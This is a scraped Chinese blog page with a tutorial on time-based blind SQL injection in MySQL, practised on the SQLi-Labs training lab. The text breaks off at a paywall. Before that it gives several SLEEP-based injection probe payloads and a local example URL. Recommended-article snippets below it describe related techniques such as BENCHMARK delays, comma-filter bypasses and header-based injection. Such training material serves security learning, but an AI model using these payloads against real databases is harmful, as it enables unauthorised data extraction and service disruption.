MySQL盲注:基于时间延迟注入(Sleep函数)

最新推荐文章于 2023-11-21 20:46:35 发布
最新推荐文章于 2023-11-21 20:46:35 发布
阅读量6.1k 收藏 1
点赞数 1
文章标签: mysql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51428325/article/details/121358000
版权
本文通过SQLi-Labs靶场实例,详细讲解了MySQL盲注的过程,包括判断注入点、获取数据库名、表名及列名,并利用Sleep函数进行时间延迟验证。逐步揭示数据库信息,如数据库名、表名和数据值。
摘要由CSDN通过智能技术生成

这里靶场我们还是以“SQLi-Labs”为实战来讲解吧!

一、判断注入点

常用的判断语句:

' and if(1=0,1, sleep(10)) --+

" and if(1=0,1, sleep(10)) --+

) and if(1=0,1, sleep(10)) --+

') and if(1=0,1, sleep(10)) --+

") and if(1=0,1, sleep(10)) --+

注入示例:

http://127.0.0.1/sqli-labs/Less-9/?id=1 ' and if(1=0,1, sleep(10)) --+

判断正确,显示you are in.......

 

判断失败,无显示

 

二、判断数据库名

1、查询数据库名长度

由于是本地测试,我知道数据库长度、名字等这些,所以用的是等号 =,实战中可以用大小于来进行一个判断,缩短时间。

最低0.47元/天 解锁文章
jinqipiaopiao
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
延时盲注(CVE-2022-0948)
Battery的博客
10-14 11万+
WordPress plugin Order Listener for WooCommerce 3.2.2 之前版本存在SQL注入漏洞。
mysql延迟_MySQL时间盲注五种延时方法 (PWNHUB 非预期解)
weixin_35972981的博客
01-18 834
转自cdxy师傅:https://www.cdxy.me/?p=789PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注中延时方法的思考。延时函数SLEEPmysql> select sleep(5);+----------+| sleep(5) |+----------+| 0 |+----------+1 row in set (5.00...
mysql 时间盲注语句,sql注入学习记录(5)-基于时间延迟的SQL盲注
weixin_30784365的博客
03-23 363
上次说到了sql注入中的基于报错盲注的基本的方法。今天说一说报错盲注基于时间延时的SQL盲注使用时间延时注入的场景:1.不能使用union select 联合查询方式注入2.有些网站没有回显,只能通过延时判断基于时间延时的SQL盲注的方法:IF表达式IF(expr1,expr2,expr3)expr1 的值为 TRUE,则返回值为 expr2expr1 的值为FALSE,则返回值为 expr3sl...
基于时间延时的注入
weixin_30617561的博客
07-19 497
若网站执行了sql后,不管是否出错,都返回正常页面。那么我们就不能通过返回的页面来指挥注入了。此时就要用基于时间延迟注入,使用sleep()函数来控制sql执行的时间。从而判断我们的语句是否执行正确。select * from test where id = 1 and if (substr(version(),1,1)=5,1,sleep(5))这条语句执行时,如果mysql版本不是5,则延时...
HTTP头sleep延迟注入
aitangdao4981的博客
05-30 333
http://123.206.87.240:8002/web15 无回显,通过http header里的X-Forwarded-For字段进行sleep注入。 源码过滤了 ',' 那么相应的if语句可以替换为select case when xxx then xxx else 0 end substr和substring里使用from 1 for 1代替',' 1 # -*...
mysql sleep函数
hugejihu9的专栏
10-17 7723
文章来自:源码在线https://www.shengli.me/mysql/66.html;   一、sleep函数用途:   它可以让sql执行的时候sleep(pause)一段时间。   二、用法(语法):sleep(duration),其中duration的单位是秒。   sleep(5) from db;    三、实例:   代码//   This sta...
Web应用安全:Mysql盲注.pptx
06-19
- **基于时间的SQL盲注**:利用`SLEEP()`或`BENCHMARK()`函数造成延迟,通过页面响应时间的不同来判断查询结果。 - **基于报错的SQL盲注**:注入能够触发MySQL错误的SQL语句,然后观察服务器返回的错误信息来获取...
Web应用安全:Sqlserver盲注.pptx
06-19
- **基于时间的SQL盲注**:利用系统等待或延迟来判断查询结果,如`WAITFOR DELAY`语句,根据页面响应时间的变化来推断信息。 - **基于报错的SQL盲注**:通过触发数据库错误,然后观察错误信息来获取数据,如使用不...
Mysql-blind-inject.zip_Blind sql injection_SQL inject_blind_blin
09-24
- **基于时间盲注**:通过延时注入,攻击者可以观察查询执行的时间差异来判断条件是否为真。例如,使用SLEEP()函数让查询在服务器端暂停一段时间。 - **基于布尔的盲注**:更常见,通过观察是否返回错误或正常...
SQL注入技巧2-常用技巧总结(攻击向量)
10-11
- **时间盲注**:利用数据库的延时函数,通过观察响应时间的变化来推断查询结果。 - 示例:`1||sleep(5)`,如果查询结果为真,则会延迟5秒后返回结果。 4. **特殊字符绕过**:在某些情况下,特殊字符可以被用来绕...
12 延时注入1
08-03
延迟注入是一种盲注的手法,通过提交对执行时间铭感的函数 SQL 语句,来判断是否执行成功。其原理是,当条件语句正确时,执行时间会变得很长,而错误时执行时间很短。这种技术可以绕过主流注入工具的检测,如 SQLMAP...
Sql注入系列详解(一)---基于时间差的盲注
AI.PLAY
05-07 1万+
Sql 基于时间盲注   基于的原理是,当对数据库进行查询操作,如果查询的条件不存在,语句执行的时间便是0.但往往语句执行的速度非常快,线程信息一闪而过,得到的执行时间基本为0. 例如: 于是sleep(N)这个语句在这种情况下起到了非常大的作用。  Select sleep(N)可以让此语句运行n秒钟。 但是如果查询语句的条件不存在,执行的时间便是0,利用该函数
sleep 延迟注入
weixin_34208185的博客
11-09 903
A: 时间注入也叫延迟注入,是一种盲注的手法 提交对执行时间铭感的函数sql语句,通过执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的高级盲注。 利用BENCHMARK sleep 函数注入 利用sleep也可以引起拒绝服务B:有时候当我们注入某站时,某站突然就打不开了,被防火墙暂时隔离,...
MySQL中的sleep函数介绍
热门推荐
weixin_44742132的博客
04-29 1万+
MySQL数据库中有一个不太常用但便于进行某些调试的函数sleep(),今天我们就来介绍一下这个函数的用法。 首先,看看官网对于函数的定义: SLEEP(duration) Sleeps (pauses) for the number of seconds given by the duration argument, then returns 0. The duration may have ...
Web安全之SQL注入漏洞学习(四)-时间盲注
u012002125的博客
10-03 2136
基于时间延迟注入(Time-based)- 时间盲注 利用sleep()或benchmark()等函数mysql执行时间变长,通过页面的响应时间来判断条件是否正确。经常与if(expr1,expr2,expr3)语句结合使用,if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。 通俗讲就是当页面不返回查询结果或者是返回空无法判断注入的语句是否成功时,通过注入特定的SQL语句,根据也面对请求的时间反馈来判断是否注入成功。 时间盲注原理介绍
mysql时间 注入 sleep_sleep 延迟注入
weixin_33205791的博客
02-02 690
A: 时间注入也叫延迟注入,是一种盲注的手法 提交对执行时间铭感的函数sql语句,通过执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的高级盲注。利用BENCHMARK sleep 函数注入利用sleep也可以引起拒绝服务B:有时候当我们注入某站时,某站突然就打不开了,被防火墙暂时隔离,你没法浏览他的页面,这时候你不得不换换IP...
揭秘MySQL SLEEP()函数:避免这些常见误区,不再被时间迷惑!
最新发布
gjc592的博客
11-21 1305
点击上方蓝字关注我关于MySQL sleep()函数,很多同学会觉得这个很简单,但是在和研发同学沟通时发现,很多人对此函数存在误解,本文举3个典型的例子进行说明。1.误区一以下SQL的运行结果是什么样的 SELECT NOW(),SLEEP(2),NOW();很多人会认为得到的结果中第二个now()的结果是第一个now()的结果的加2s。但实际运行的结果是什么呢?mysql> SELECT ...
mysql的延迟函数_mysql延迟判断模板
weixin_42309599的博客
02-03 615
使用自定义模板#!/usr/bin/envpython#coding:utf-8importMySQLdbimporttorndbsql_s="showslavestatus"sql_m="showmasterstatus"#使用MySQLdb的连接defdb_conM(args):#args={'host':[mhost,shost],'user':use...
mysql 函数延时_mysql定义异常/表不存在异常/延时函数/now()-sysdate()
weixin_42415498的博客
02-01 191
delimiter $$drop procedure if exists lims_data.sp_test_100$$create procedure lims_data.sp_test_100(outcur_time1bigint unsigned,outcur_time2bigint unsigned,out cntint unsigned)begindeclare _sleepint un...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值